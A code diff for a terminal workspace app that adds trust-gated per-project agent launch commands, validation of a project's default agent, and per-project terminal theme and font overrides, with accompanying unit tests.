+  trusted: { agents: trustedAgents, shell: true }
+})
+
+const settingsWith = (patch: Partial<Settings>): void => {
+  useSettings.setState({ settings: { ...DEFAULT_SETTINGS, ...patch } })
+}
+
+beforeEach(() => {
+  resetProjectLaunchInfoForTests()
+  resetLaunchTrustAsksForTests()
+  requestTrust.mockClear()
+  requestTrust.mockImplementation(() => Promise.resolve(false))
+})
+
+afterEach(() => {
+  useSettings.setState({ settings: DEFAULT_SETTINGS })
+  delete (globalThis as { window?: unknown }).window
+})
+
+describe('agentLaunchOverride — per-project launchCmd', () => {
+  it('is the global override when no project is named', async () => {
+    settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
+    await warmProject('p1', info({ launchCmd: { value: 'proj-wrap', source: 'local' } }, true))
+    expect(agentLaunchOverride('claude')).toBe('global-wrap')
+  })
+
+  it('is the global override when the project has no warm snapshot', () => {
+    settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
+    expect(agentLaunchOverride('claude', 'p1')).toBe('global-wrap')
+  })
+
+  it('lets a project LOCAL launchCmd win over the global override', async () => {
+    settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
+    await warmProject('p1', info({ launchCmd: { value: 'local-wrap', source: 'local' } }, false))
+    expect(agentLaunchOverride('claude', 'p1')).toBe('local-wrap')
+    // A local value is the user's own typing — never gated, so nothing is ever asked.
+    expect(requestTrust).not.toHaveBeenCalled()
+  })
+
+  it('lets a TRUSTED shared launchCmd win over the global override', async () => {
+    settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
+    await warmProject('p1', info({ launchCmd: { value: 'shared-wrap', source: 'shared' } }, true))
+    expect(agentLaunchOverride('claude', 'p1')).toBe('shared-wrap')
+    expect(requestTrust).not.toHaveBeenCalled()
+  })
+
+  it('falls PAST an untrusted shared launchCmd to the global override', async () => {
+    settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
+    await warmProject('p1', info({ launchCmd: { value: 'shared-wrap', source: 'shared' } }, false))
+    expect(agentLaunchOverride('claude', 'p1')).toBe('global-wrap')
+  })
+
+  it('falls through to the bare command when there is no global override either', async () => {
+    await warmProject('p1', info({ launchCmd: { value: 'shared-wrap', source: 'shared' } }, false))
+    expect(agentLaunchOverride('claude', 'p1')).toBeUndefined()
+    expect(claudeLaunchCommand('p1')).toBe('claude')
+  })
+
+  it('asks for trust exactly ONCE per project per session, however many launches ask', async () => {
+    await warmProject('p1', info({ launchCmd: { value: 'shared-wrap', source: 'shared' } }, false))
+    agentLaunchOverride('claude', 'p1')
+    agentLaunchOverride('claude', 'p1')
+    agentLaunchOverride('claude', 'p1')
+    expect(requestTrust).toHaveBeenCalledTimes(1)
+    expect(requestTrust).toHaveBeenCalledWith('p1', 'agents')
+  })
+
+  it('survives a requestTrust that REJECTS — the launch line is still resolved', async () => {
+    requestTrust.mockImplementation(() => Promise.reject(new Error('no handler')))
+    settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
+    await warmProject('p1', info({ launchCmd: { value: 'shared-wrap', source: 'shared' } }, false))
+    expect(agentLaunchOverride('claude', 'p1')).toBe('global-wrap')
+    await Promise.resolve()
+  })
+
+  it('never asks for trust when the project sets no shared launchCmd at all', async () => {
+    await warmProject('p1', info({}, false))
+    expect(agentLaunchOverride('claude', 'p1')).toBeUndefined()
+    expect(requestTrust).not.toHaveBeenCalled()
+  })
+
+  it('applies only to the agent the project targets — another agent keeps the global path', async () => {
+    settingsWith({ agentLaunchCommands: { codex: 'global-codex' }, defaultAgent: 'claude' })
+    await warmProject('p1', info({ launchCmd: { value: 'proj-wrap', source: 'local' } }, true))
+    expect(agentLaunchOverride('claude', 'p1')).toBe('proj-wrap')
+    expect(agentLaunchOverride('codex', 'p1')).toBe('global-codex')
+  })
+
+  it('follows the project’s own defaultAgentId when deciding which agent it targets', async () => {
+    settingsWith({ defaultAgent: 'claude' })
+    await warmProject(
+      'p1',
+      info(
+        {
+          defaultAgentId: { value: 'codex', source: 'local' },
+          launchCmd: { value: 'proj-wrap', source: 'local' }
+        },
+        true
+      )
+    )
+    expect(agentLaunchOverride('codex', 'p1')).toBe('proj-wrap')
+    expect(agentLaunchOverride('claude', 'p1')).toBeUndefined()
+  })
+
+  it('does not ask for trust when the shared launchCmd targets another agent', async () => {
+    settingsWith({ defaultAgent: 'claude' })
+    await warmProject('p1', info({ launchCmd: { value: 'shared-wrap', source: 'shared' } }, false))
+    expect(agentLaunchOverride('codex', 'p1')).toBeUndefined()
+    expect(requestTrust).not.toHaveBeenCalled()
+  })
+
+  it('ignores a blank project launchCmd (and asks nothing for it)', async () => {
+    settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
+    await warmProject('p1', info({ launchCmd: { value: '   ', source: 'shared' } }, false))
+    expect(agentLaunchOverride('claude', 'p1')).toBe('global-wrap')
+    expect(requestTrust).not.toHaveBeenCalled()
+  })
+
+  it('ignores a non-string launchCmd from a hostile shared document', async () => {
+    settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
+    await warmProject(
+      'p1',
+      info({ launchCmd: { value: 42 as unknown as string, source: 'shared' } }, true)
+    )
+    expect(agentLaunchOverride('claude', 'p1')).toBe('global-wrap')
+  })
+})
+
+describe('createAgentNode — the project launch command reaches the typed line', () => {
+  it('launches the project’s default agent through the project wrapper', async () => {
+    await warmProject('p1', info({ launchCmd: { value: 'proj-wrap', source: 'local' } }, true))
+    const node = createAgentNode(
+      'claude',
+      0,
+      undefined,
+      undefined,
+      'fix the bug',
+      undefined,
+      undefined,
+      undefined,
+      'p1'
+    )
+    expect(node.data.initialCommand).toBe("proj-wrap 'fix the bug'")
+  })
+
+  it('stays byte-identical to today when no project id is threaded', () => {
+    const node = createAgentNode('claude', 0, undefined, undefined, 'fix the bug')
+    expect(node.data.initialCommand).toBe("claude 'fix the bug'")
+  })
+})
+
+describe('resolveNewNodeAgent', () => {
+  const settings = (patch: Partial<Settings>): Settings => ({ ...DEFAULT_SETTINGS, ...patch })
+
+  it('never overrules an explicit pick', async () => {
+    await warmProject('p1', info({ defaultAgentId: { value: 'codex', source: 'local' } }, true))
+    expect(resolveNewNodeAgent('gemini', 'p1', settings({ defaultAgent: 'claude' }))).toBe('gemini')
+  })
+
+  it('uses the project default above the global one', async () => {
+    await warmProject('p1', info({ defaultAgentId: { value: 'codex', source: 'local' } }, true))
+    expect(resolveNewNodeAgent(undefined, 'p1', settings({ defaultAgent: 'claude' }))).toBe('codex')
+  })
+
+  it('accepts a shared project default without a trust grant (naming is not executing)', async () => {
+    await warmProject('p1', info({ defaultAgentId: { value: 'codex', source: 'shared' } }, false))
+    expect(resolveNewNodeAgent(undefined, 'p1', settings({ defaultAgent: 'claude' }))).toBe('codex')
+  })
+
+  it('accepts a custom agent the user actually has', async () => {
+    await warmProject('p1', info({ defaultAgentId: { value: 'custom:x', source: 'local' } }, true))
+    const s = settings({
+      defaultAgent: 'claude',
+      customAgents: [{ id: 'custom:x', label: 'X', launchCmd: 'x-cli' }] as Settings['customAgents']
+    })
+    expect(resolveNewNodeAgent(undefined, 'p1', s)).toBe('custom:x')
+  })
+
+  it('falls through when the project names an agent that does not exist', async () => {
+    await warmProject('p1', info({ defaultAgentId: { value: 'custom:gone', source: 'local' } }, true))
+    expect(resolveNewNodeAgent(undefined, 'p1', settings({ defaultAgent: 'claude' }))).toBe('claude')
+  })
+
+  it('falls through when the project names an agent the user has DISABLED', async () => {
+    await warmProject('p1', info({ defaultAgentId: { value: 'codex', source: 'shared' } }, true))
+    const s = settings({ defaultAgent: 'claude', disabledAgents: ['codex'] })
+    expect(resolveNewNodeAgent(undefined, 'p1', s)).toBe('claude')
+  })
+
+  it('falls through on a non-string / blank id from a hostile document', async () => {
+    await warmProject('p1', info({ defaultAgentId: { value: '  ', source: 'shared' } }, true))
+    expect(resolveNewNodeAgent(undefined, 'p1', settings({ defaultAgent: 'claude' }))).toBe('claude')
+  })
+
+  it('is the global default when there is no project (or no snapshot)', () => {
+    expect(resolveNewNodeAgent(undefined, undefined, settings({ defaultAgent: 'gemini' }))).toBe('gemini')
+    expect(resolveNewNodeAgent(undefined, 'cold', settings({ defaultAgent: 'gemini' }))).toBe('gemini')
+  })
+
+  it('guards a global default whose custom agent was since removed', () => {
+    expect(
+      resolveNewNodeAgent(undefined, undefined, settings({ defaultAgent: 'custom:gone' }))
+    ).toBe('claude')
+  })
+})

--- a/src/renderer/state/workspace.ts
+++ b/src/renderer/state/workspace.ts
@@ -358,10 +358,19 @@ function askAgentsTrustOnce(projectId: string): void {
  *  3. the user's global Settings → Agents → Launch commands entry (builtin-keyed: custom agents
  *     index past it to undefined — they already own their launchCmd).
  *
- * SCOPE: the project's launchCmd applies to the agent that project TARGETS — the panel's own copy
- * is "Overrides how the default agent is launched", and the family holds one launchCmd, not one
- * per agent id. So it is used only when `agentId` is the project's effective default
- * (`resolveNewNodeAgent`); every other agent resolves on the global layer, exactly as before.
+ * SCOPE: the project's launchCmd applies ONLY to the agent that project ITSELF names —
+ * `projectDefaultAgent`, its own valid `agents.defaultAgentId`, never the global default. The
+ * family holds one launchCmd, not one per agent id, and the panel's copy is "Overrides how the
+ * default agent is launched", so it needs an agent to be about; the pair is what makes it
+ * meaningful. Falling back to the GLOBAL default here would have been a cross-agent misfire that
+ * the builtin-KEYED global map made structurally impossible: a doc shipping only `launchCmd` would
+ * follow whatever this user's mutable global default happens to be, so `nix develop -c claude`
+ * could end up typed into a codex node, differently on each teammate's machine, and could change
+ * under a node on cold restore after an unrelated Settings change.
+ *
+ * So an UNPAIRED launchCmd (a project that sets no valid `defaultAgentId` of its own) is a dead
+ * setting: never consumed for any agent, and never prompts for trust. The Agents panel says so
+ * on the row itself (`ProjectSettingsFamilies.tsx`) rather than leaving it silently inert.
  *
  * Fails OPEN in the ordinary sense: no project id, or no warm snapshot for it
  * (`projectLaunchInfoNow` is synchronous by design — see its module doc), resolves layer 3 alone,
@@ -374,11 +383,10 @@ export function agentLaunchOverride(agentId: AgentId, projectId?: string): strin
   if (!info) return global
   const entry = info.resolved.agents.launchCmd
   if (!entry) return global
-  // Scope check BEFORE anything else: an agent this project does not target consumes nothing here,
+  // Scope check BEFORE anything else: an agent this project does not name consumes nothing here,
   // so it must not even raise a trust prompt about a value it would never use.
-  if (agentId !== resolveNewNodeAgent(undefined, projectId, useSettings.getState().settings)) {
-    return global
-  }
+  const target = projectDefaultAgent(projectId, useSettings.getState().settings)
+  if (!target || target !== agentId) return global
   // `.nodeterm/settings.json` is hand-editable, git-shared, hostile input (see @shared/project-settings):
   // a non-string that slipped through is simply not a launch command.
   const cmd = typeof entry.value === 'string' ? entry.value.trim() : ''
@@ -406,31 +414,43 @@ export function claudeLaunchCommand(projectId?: string): string {
 }
 
 /**
- * The agent a NEW node launches: an explicit pick always wins, then the project's own
- * `agents.defaultAgentId`, then the global default.
+ * The agent THIS PROJECT names as its own default (`agents.defaultAgentId`), or undefined when it
+ * names none — deliberately WITHOUT any global fallback, so a caller can tell "the project chose
+ * this agent" from "nobody chose, so the app's default applies". `agentLaunchOverride`'s scoping
+ * turns on exactly that difference; `resolveNewNodeAgent` adds the fallback on top.
  *
- * The project value is VALIDATED against what this machine can actually launch — a known builtin,
- * or a custom agent the user still has — and against `disabledAgents`: `.nodeterm/settings.json`
- * is git-shared and hand-editable, so it may name an agent that was removed, never existed, or
- * that this user deliberately switched off, and none of those may become the id typed into a
- * shell (`resolveAgent`'s unknown-id fallback launches the id itself — the same failure
+ * VALIDATED against what this machine can actually launch — a known builtin, or a custom agent the
+ * user still has — and against `disabledAgents`: `.nodeterm/settings.json` is git-shared and
+ * hand-editable, so it may name an agent that was removed, never existed, or that this user
+ * deliberately switched off, and none of those may become the id typed into a shell
+ * (`resolveAgent`'s unknown-id fallback launches the id itself — the same failure
  * `launchableDefaultAgent` exists to prevent for the global setting).
  *
  * Deliberately NOT trust-gated: naming which of the user's own installed agents to open is not
  * executable content (`projectTrustContent('agents', …)` hashes launchCmd + env, not this), and
  * every id it can select resolves to a command the user already configured themselves.
  */
+function projectDefaultAgent(
+  projectId: string | undefined,
+  settings: Settings
+): AgentId | undefined {
+  const raw = projectId ? projectLaunchInfoNow(projectId)?.resolved.agents.defaultAgentId : undefined
+  const id = typeof raw?.value === 'string' ? raw.value.trim() : ''
+  if (!id) return undefined
+  const known = !!agentConfig(id) || settings.customAgents.some((c) => c.id === id)
+  return known && isAgentEnabled(settings, id) ? id : undefined
+}
+
+/**
+ * The agent a NEW node launches: an explicit pick always wins, then the project's own validated
+ * `agents.defaultAgentId` (`projectDefaultAgent`), then the global default.
+ */
 export function resolveNewNodeAgent(
   explicit: AgentId | undefined,
   projectId: string | undefined,
   settings: Settings
 ): AgentId {
-  if (explicit) return explicit
-  const raw = projectId ? projectLaunchInfoNow(projectId)?.resolved.agents.defaultAgentId : undefined
-  const id = typeof raw?.value === 'string' ? raw.value.trim() : ''
-  const known = !!id && (!!agentConfig(id) || settings.customAgents.some((c) => c.id === id))
-  if (known && isAgentEnabled(settings, id)) return id
-  return launchableDefaultAgent(settings)
+  return explicit ?? projectDefaultAgent(projectId, settings) ?? launchableDefaultAgent(settings)
 }
 
 /** Fallback color for custom / unknown agents that have no config-provided color. */

--- a/src/renderer/state/workspace.ts
+++ b/src/renderer/state/workspace.ts
@@ -391,6 +391,23 @@ export function agentLaunchOverride(agentId: AgentId, projectId?: string): strin
   // a non-string that slipped through is simply not a launch command.
   const cmd = typeof entry.value === 'string' ? entry.value.trim() : ''
   if (!cmd) return global
+  // LITERAL ONLY — the same rule the project's ENV already obeys (`ProjectSpawnOverrides.env`:
+  // "`${env:VAR}` is NOT expanded here"), and for the same reason. The assembler expands
+  // `${env:…}` in whatever `launchCmdOverride` it is handed (`shared/agents/launch.ts`
+  // `expandedProgram`) — a CUSTOM-AGENT feature, where the value is the local user's own typing and
+  // Settings previews the expansion. Inheriting it for a project document would turn a hand-edited,
+  // git-shared settings.json into a read of THIS machine's environment, laundered past a consent
+  // dialog that rendered the token verbatim. Nor is honoring it literally an option: `${env:X}` is a
+  // bad substitution at bash/zsh, so the typed line would fail anyway. So a project launchCmd
+  // carrying a token is not a launch command — the same verdict, and the same fall-through, as the
+  // non-string case above. Checked BEFORE the trust branch so a value that can never be consumed
+  // never raises a question about itself, exactly like the out-of-scope agent check.
+  //
+  // BOTH halves, local as well as shared — the deliberate overreach `isReservedSpawnEnvKey` explains
+  // for the env list: one auditable rule beats a provenance check at every launch. The cost is that
+  // a local overlay cannot use expansion either; the global Settings → Agents override (which does
+  // expand, and is previewed) is where a wrapper that needs `${env:…}` belongs.
+  if (cmd.includes('${env:')) return global
   if (entry.source === 'local') return cmd
   // NOTE (carried from Task 2's review): the trust-changed invalidation this ask relies on is
   // keyed by projectId while the grant itself is keyed by LOCATION — two projects pointing at the

--- a/src/renderer/state/workspace.ts
+++ b/src/renderer/state/workspace.ts
@@ -1,11 +1,21 @@
 import type { Node } from '@xyflow/react'
-import type { CanvasMutation, CanvasNodeState, ClaudeAccount, NodeKind, PendingLaunch, Project } from '@shared/types'
+import type {
+  CanvasMutation,
+  CanvasNodeState,
+  ClaudeAccount,
+  NodeKind,
+  PendingLaunch,
+  Project,
+  Settings
+} from '@shared/types'
 import type { AgentId, AgentPermissionMode, BuiltinAgentId } from '@shared/agents/config'
 import { agentConfig, supportsSessionIdFlag } from '@shared/agents/config'
 import { assembleLaunchCommand } from '@shared/agents/launch'
 import { agentEnvSnapshot } from '../lib/agentEnv'
 import { uuid } from '@renderer/lib/uuid'
 import { claudeCliCapsNow } from './permissionMode'
+import { projectLaunchInfoNow } from './projectLaunchInfo'
+import { isAgentEnabled, launchableDefaultAgent } from './agentAvailability'
 import { codexSharedIdentity } from './codexIdentity'
 import { sshHostKey } from '@shared/ssh'
 import { useSettings } from './settings'
@@ -293,21 +303,94 @@ export function createSshTerminalNode(
   }
 }
 
-/**
- * The user's launch-command override for a builtin agent (Settings → Agents → Launch commands),
- * or undefined when unset/blank. This is the ONE place the setting is read; every launch site
- * (new node, cold restore, in-place restart, hibernation wake, transcript resume) either calls
- * this or receives its result — shared/agents/config.ts cannot read settings (layering), so the
- * renderer resolves the override and passes it down (`resumeCommand`'s `base` param).
- *
- * Trusted verbatim, like a custom agent's `launchCmd`: it comes from the local user's own
- * settings.json and is typed into their own pane. Custom agents index past the builtin-keyed map
- * to undefined — they already own their launchCmd.
- */
-export function agentLaunchOverride(agentId: AgentId): string | undefined {
+/** The user's OWN global launch-command override, with no project layered over it. */
+function globalLaunchOverride(agentId: AgentId): string | undefined {
   const raw = useSettings.getState().settings.agentLaunchCommands?.[agentId as BuiltinAgentId]
   const cmd = typeof raw === 'string' ? raw.trim() : ''
   return cmd || undefined
+}
+
+/**
+ * Projects whose SHARED `agents` family we have already asked the human to trust this session.
+ * The ask is fire-and-forget from a synchronous launch path (a launch is never blocked on it), so
+ * without this every single launch in an untrusted project would re-raise the dialog. Once per
+ * project is enough: an approval makes main fire `projectSettings.onTrustChanged`, Canvas
+ * invalidates that project's launch-info cache, and the NEXT launch reads the fresh verdict and
+ * picks the shared launchCmd up on its own.
+ */
+const agentsTrustAsked = new Set<string>()
+
+/** Test seam: forget which projects have already been asked (see `agentsTrustAsked`). */
+export function resetLaunchTrustAsksForTests(): void {
+  agentsTrustAsked.clear()
+}
+
+/** Raise the `agents` trust prompt for a project, at most once per project per session. Never
+ *  awaited and never allowed to throw: this runs inside a synchronous launch resolution, and the
+ *  answer (if any) arrives via the trust-changed invalidation, not via this call. */
+function askAgentsTrustOnce(projectId: string): void {
+  if (agentsTrustAsked.has(projectId)) return
+  agentsTrustAsked.add(projectId)
+  try {
+    // The preload leg REJECTS when the main handler throws (the ws-bridge leg maps that to false),
+    // so the `.catch` is load-bearing — an unhandled rejection here would surface as a renderer
+    // error on a path whose whole contract is "the launch does not care about the answer".
+    void window.nodeTerminal?.projectSetup?.requestTrust(projectId, 'agents').catch(() => {})
+  } catch {
+    // No bridge leg at all (older relay host, a stub) — the launch proceeds on the global value.
+  }
+}
+
+/**
+ * The launch-command override for an agent, or undefined when nothing overrides the bare CLI.
+ * This is the ONE place launch commands are read; every launch site (new node, cold restore,
+ * in-place restart, hibernation wake, transcript resume) either calls this or receives its result
+ * — shared/agents/config.ts cannot read settings (layering), so the renderer resolves the override
+ * and passes it down (`resumeCommand`'s `base` param).
+ *
+ * Three layers, most specific first, with `projectId` naming the project that OWNS the node:
+ *  1. the project's LOCAL `.nodeterm/settings.json` `agents.launchCmd` — this machine's own file,
+ *     the user's own typing, never gated;
+ *  2. the project's git-SHARED `agents.launchCmd`, but ONLY while that family is trusted at this
+ *     location. Falling PAST an untrusted one raises the trust prompt (once per project, see
+ *     `askAgentsTrustOnce`) and resolves on the layer below meanwhile — a launch is never blocked,
+ *     never delayed, and never runs a shared command the human has not seen;
+ *  3. the user's global Settings → Agents → Launch commands entry (builtin-keyed: custom agents
+ *     index past it to undefined — they already own their launchCmd).
+ *
+ * SCOPE: the project's launchCmd applies to the agent that project TARGETS — the panel's own copy
+ * is "Overrides how the default agent is launched", and the family holds one launchCmd, not one
+ * per agent id. So it is used only when `agentId` is the project's effective default
+ * (`resolveNewNodeAgent`); every other agent resolves on the global layer, exactly as before.
+ *
+ * Fails OPEN in the ordinary sense: no project id, or no warm snapshot for it
+ * (`projectLaunchInfoNow` is synchronous by design — see its module doc), resolves layer 3 alone,
+ * byte-identical to the behavior before per-project settings existed.
+ */
+export function agentLaunchOverride(agentId: AgentId, projectId?: string): string | undefined {
+  const global = globalLaunchOverride(agentId)
+  if (!projectId) return global
+  const info = projectLaunchInfoNow(projectId)
+  if (!info) return global
+  const entry = info.resolved.agents.launchCmd
+  if (!entry) return global
+  // Scope check BEFORE anything else: an agent this project does not target consumes nothing here,
+  // so it must not even raise a trust prompt about a value it would never use.
+  if (agentId !== resolveNewNodeAgent(undefined, projectId, useSettings.getState().settings)) {
+    return global
+  }
+  // `.nodeterm/settings.json` is hand-editable, git-shared, hostile input (see @shared/project-settings):
+  // a non-string that slipped through is simply not a launch command.
+  const cmd = typeof entry.value === 'string' ? entry.value.trim() : ''
+  if (!cmd) return global
+  if (entry.source === 'local') return cmd
+  // NOTE (carried from Task 2's review): the trust-changed invalidation this ask relies on is
+  // keyed by projectId while the grant itself is keyed by LOCATION — two projects pointing at the
+  // same folder each keep their own cached verdict, so the sibling stays cold until its own
+  // refresh. Known and deliberate; the cost is one extra prompt, never a wrong grant.
+  if (info.trusted.agents) return cmd
+  askAgentsTrustOnce(projectId)
+  return global
 }
 
 /**
@@ -316,9 +399,38 @@ export function agentLaunchOverride(agentId: AgentId): string | undefined {
  * `claude` is enough — which is also why an override wrapper (account switchers etc.) is safe
  * here: hooks identify the session whatever the launch line was, as long as the wrapper ends up
  * exec-ing the real CLI. Append `-r <id>` to resume a specific session (used by Branch).
+ * `projectId` layers that project's own launchCmd over the global one (`agentLaunchOverride`).
  */
-export function claudeLaunchCommand(): string {
-  return agentLaunchOverride('claude') ?? 'claude'
+export function claudeLaunchCommand(projectId?: string): string {
+  return agentLaunchOverride('claude', projectId) ?? 'claude'
+}
+
+/**
+ * The agent a NEW node launches: an explicit pick always wins, then the project's own
+ * `agents.defaultAgentId`, then the global default.
+ *
+ * The project value is VALIDATED against what this machine can actually launch — a known builtin,
+ * or a custom agent the user still has — and against `disabledAgents`: `.nodeterm/settings.json`
+ * is git-shared and hand-editable, so it may name an agent that was removed, never existed, or
+ * that this user deliberately switched off, and none of those may become the id typed into a
+ * shell (`resolveAgent`'s unknown-id fallback launches the id itself — the same failure
+ * `launchableDefaultAgent` exists to prevent for the global setting).
+ *
+ * Deliberately NOT trust-gated: naming which of the user's own installed agents to open is not
+ * executable content (`projectTrustContent('agents', …)` hashes launchCmd + env, not this), and
+ * every id it can select resolves to a command the user already configured themselves.
+ */
+export function resolveNewNodeAgent(
+  explicit: AgentId | undefined,
+  projectId: string | undefined,
+  settings: Settings
+): AgentId {
+  if (explicit) return explicit
+  const raw = projectId ? projectLaunchInfoNow(projectId)?.resolved.agents.defaultAgentId : undefined
+  const id = typeof raw?.value === 'string' ? raw.value.trim() : ''
+  const known = !!id && (!!agentConfig(id) || settings.customAgents.some((c) => c.id === id))
+  if (known && isAgentEnabled(settings, id)) return id
+  return launchableDefaultAgent(settings)
 }
 
 /** Fallback color for custom / unknown agents that have no config-provided color. */
@@ -393,14 +505,16 @@ export function createAgentNode(
   initialPrompt?: string,
   ssh?: Project['ssh'],
   accountId?: string,
-  permissionMode?: AgentPermissionMode
+  permissionMode?: AgentPermissionMode,
+  projectId?: string
 ): CanvasNode {
   const { label, color } = resolveAgent(agentId)
-  // A per-builtin launch-command override (Settings -> Agents -> Launch commands) replaces the bare
-  // CLI in the assembled command. Threaded into the shared assembler below as `launchCmdOverride`
-  // so fresh launch, cold-restore resume and in-place restart all pick it up identically. Custom
-  // agents already own their `launchCmd`, so the helper returns undefined for them.
-  const launchCmdOverride = agentLaunchOverride(agentId)
+  // The launch-command override (this project's `.nodeterm/settings.json` first, then Settings →
+  // Agents → Launch commands — see `agentLaunchOverride`) replaces the bare CLI in the assembled
+  // command. Threaded into the shared assembler below as `launchCmdOverride` so fresh launch,
+  // cold-restore resume and in-place restart all pick it up identically. Custom agents already own
+  // their `launchCmd`, so the global layer returns undefined for them.
+  const launchCmdOverride = agentLaunchOverride(agentId, projectId)
   // The session id is DECIDED here rather than learned from a hook later, so this node always has
   // something to resume with — see SESSION_ID_CAPABLE for the failure this closes. `uuid()` (not
   // crypto.randomUUID) because the Server Edition serves plain HTTP on a LAN, where randomUUID is

--- a/src/renderer/terminal/terminal-config.test.ts
+++ b/src/renderer/terminal/terminal-config.test.ts
@@ -24,6 +24,7 @@ import {
   toXtermText,
   xtermScrollback,
   applyLiveOptions,
+  mergeProjectVisuals,
   terminalLetterSpacing,
   terminalLineHeight,
   xtermOptionsFromSettings,
@@ -906,5 +907,65 @@ describe('applyLiveOptions', () => {
     expect(term.options.fontSize).toBe(18)
     expect(term.options.cursorStyle).toBe('underline')
     expect(term.options.theme).toBe(resolveTerminalTheme('nord').theme)
+  })
+})
+
+describe('mergeProjectVisuals (a project\'s own theme / font over the global settings)', () => {
+  it('returns the base BY IDENTITY when the project overrides nothing', () => {
+    const base = visual()
+    expect(mergeProjectVisuals(base, undefined)).toBe(base)
+    expect(mergeProjectVisuals(base, {})).toBe(base)
+  })
+
+  it('lets a project theme win over the global one', () => {
+    const merged = mergeProjectVisuals(visual({ terminalTheme: 'nord' }), { theme: 'dracula' })
+    expect(merged.terminalTheme).toBe('dracula')
+    expect(xtermOptionsFromSettings(merged).theme).toBe(resolveTerminalTheme('dracula').theme)
+  })
+
+  it('lets a project font family win over the global one', () => {
+    const merged = mergeProjectVisuals(visual({ fontFamily: 'Menlo' }), { fontFamily: 'Iosevka' })
+    expect(merged.fontFamily).toBe('Iosevka')
+    expect(xtermOptionsFromSettings(merged).fontFamily).toBe('Iosevka')
+  })
+
+  // The whole reason `isKnownTerminalThemeId` exists: `resolveTerminalTheme` is total, so passing an
+  // unknown override straight through would repaint the project's terminals with the APP DEFAULT
+  // rather than leaving the user's own global choice alone.
+  it('falls back to the GLOBAL theme for an unknown id, not to the app default', () => {
+    const merged = mergeProjectVisuals(visual({ terminalTheme: 'nord' }), { theme: 'bogus' })
+    expect(merged.terminalTheme).toBe('nord')
+    expect(xtermOptionsFromSettings(merged).theme).toBe(resolveTerminalTheme('nord').theme)
+    expect(xtermOptionsFromSettings(merged).theme).not.toBe(
+      resolveTerminalTheme('nodeterm-dark').theme
+    )
+  })
+
+  it('ignores a blank font family rather than handing xterm an empty string', () => {
+    const base = visual({ fontFamily: 'Menlo' })
+    expect(mergeProjectVisuals(base, { fontFamily: '' })).toBe(base)
+    expect(mergeProjectVisuals(base, { fontFamily: '   ' })).toBe(base)
+  })
+
+  it('overrides one value without disturbing the other twelve', () => {
+    const base = visual({ fontSize: 15, cursorStyle: 'bar' })
+    const merged = mergeProjectVisuals(base, { theme: 'nord' })
+    expect(merged).toEqual({ ...base, terminalTheme: 'nord' })
+  })
+
+  // Live application rides the EXISTING machinery: nothing new re-fits, and a project font is a
+  // cell-geometry change exactly like a global one (see the co-attach caveat on mergeProjectVisuals).
+  it('feeds applyLiveOptions the same way a global change does', () => {
+    const base = visual()
+    const backing = xtermOptionsFromSettings(base) as unknown as Record<string, unknown>
+    const term = { options: backing } as LiveOptionTarget
+    expect(applyLiveOptions(term, mergeProjectVisuals(base, { theme: 'nord' }))).toEqual({
+      metricsChanged: false,
+      themeChanged: true
+    })
+    expect(applyLiveOptions(term, mergeProjectVisuals(base, { fontFamily: 'Iosevka' }))).toEqual({
+      metricsChanged: true,
+      themeChanged: true // back off `nord` — the project no longer sets a theme in this call
+    })
   })
 })

--- a/src/renderer/terminal/terminal-config.ts
+++ b/src/renderer/terminal/terminal-config.ts
@@ -6,7 +6,7 @@ import type {
   TerminalCursorInactiveStyle,
   TerminalCursorStyle
 } from '@shared/types'
-import { resolveTerminalTheme } from './themes'
+import { isKnownTerminalThemeId, resolveTerminalTheme } from './themes'
 
 /**
  * Pure decisions behind the xterm instance in `TerminalNode` — extracted so they can be tested
@@ -250,6 +250,58 @@ export const XTERM_VISUAL_KEYS = [
   'terminalTheme',
   'tmuxScrollback'
 ] as const satisfies readonly (keyof XtermVisualSettings)[]
+
+/**
+ * The two appearance values a PROJECT may set for its own terminals (`terminal.theme` /
+ * `terminal.fontFamily` in `.nodeterm/settings.json`, local-over-shared already applied).
+ *
+ * Deliberately UNGATED by the project trust store, unlike the same family's `shell`: neither value
+ * can execute anything — the worst a hostile shared document achieves is an ugly terminal, which is
+ * visible and one edit away from being undone. Gating them would put a consent dialog in front of a
+ * colour.
+ */
+export interface ProjectVisualOverrides {
+  theme?: string
+  fontFamily?: string
+}
+
+/**
+ * Layer a project's appearance overrides on top of this machine's global appearance settings.
+ *
+ * Returns `base` BY IDENTITY when nothing is overridden — the result is a `useMemo`/effect
+ * dependency in `useXtermVisualSettings`, and a fresh object per render would re-run the live
+ * re-option pass on every terminal for nothing.
+ *
+ * Two rules, both about failing back to the GLOBAL value rather than to the app default:
+ *  - an unknown theme id is ignored (see `isKnownTerminalThemeId`),
+ *  - an empty/blank `fontFamily` is ignored — handing xterm `''` yields the browser default font,
+ *    which is not what "this project sets no font" means.
+ *
+ * CO-ATTACH CAVEAT (the reason this merge is worth a comment at all): `fontFamily` is CELL GEOMETRY,
+ * so a project-scoped font makes `applyLiveOptions` report `metricsChanged` and the caller re-fit —
+ * and under co-attach (one pty, N subscribers) the pty runs at the SMALLEST subscriber's grid. A
+ * project font therefore re-reports THIS viewer's grid to a pty that other viewers may share (a
+ * modal card over the same session, another device attached to it), exactly as a global font change
+ * already does. That is the existing machinery working as designed, not a new hazard — but it does
+ * mean a per-project font is not visually private to that project's window. Nothing extra is done
+ * here: the re-fit is precisely what keeps the pty from being clamped to a stale grid.
+ */
+export function mergeProjectVisuals(
+  base: XtermVisualSettings,
+  overrides: ProjectVisualOverrides | undefined
+): XtermVisualSettings {
+  const theme = isKnownTerminalThemeId(overrides?.theme) ? overrides!.theme! : undefined
+  const fontFamily =
+    typeof overrides?.fontFamily === 'string' && overrides.fontFamily.trim() !== ''
+      ? overrides.fontFamily
+      : undefined
+  if (theme === undefined && fontFamily === undefined) return base
+  return {
+    ...base,
+    ...(theme !== undefined ? { terminalTheme: theme } : {}),
+    ...(fontFamily !== undefined ? { fontFamily } : {})
+  }
+}
 
 /** The appearance-derived options, resolved and clamped. */
 export interface XtermVisualOptions {

--- a/src/renderer/terminal/themes.ts
+++ b/src/renderer/terminal/themes.ts
